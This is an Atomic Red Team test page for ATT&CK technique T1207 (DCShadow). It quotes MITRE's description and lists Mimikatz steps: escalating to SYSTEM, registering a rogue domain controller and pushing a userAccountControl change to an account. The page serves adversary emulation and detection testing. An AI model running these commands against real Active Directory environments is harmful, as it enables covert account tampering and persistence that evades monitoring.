security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1207/T1207.md
T
CircleCI Atomic Red Team doc generator 159697cc2e Generate docs from job=validate_atomics_generate_docs branch=master
2019-09-03 15:21:17 +00:00

36 lines
2.2 KiB
Markdown
Raw Blame History

# T1207 - DCShadow
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1207)
<blockquote>DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018)</blockquote>
## Atomic Tests
- [Atomic Test #1 - DCShadow - Mimikatz](#atomic-test-1---dcshadow---mimikatz)
<br/>
## Atomic Test #1 - DCShadow - Mimikatz
Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
[DCShadow](https://www.dcshadow.com/)
[Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
**Supported Platforms:** Windows
#### Run it with these steps!
1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
4. lsadump::dcshadow /push
<br/>
Reference in New Issue View Git Blame Copy Permalink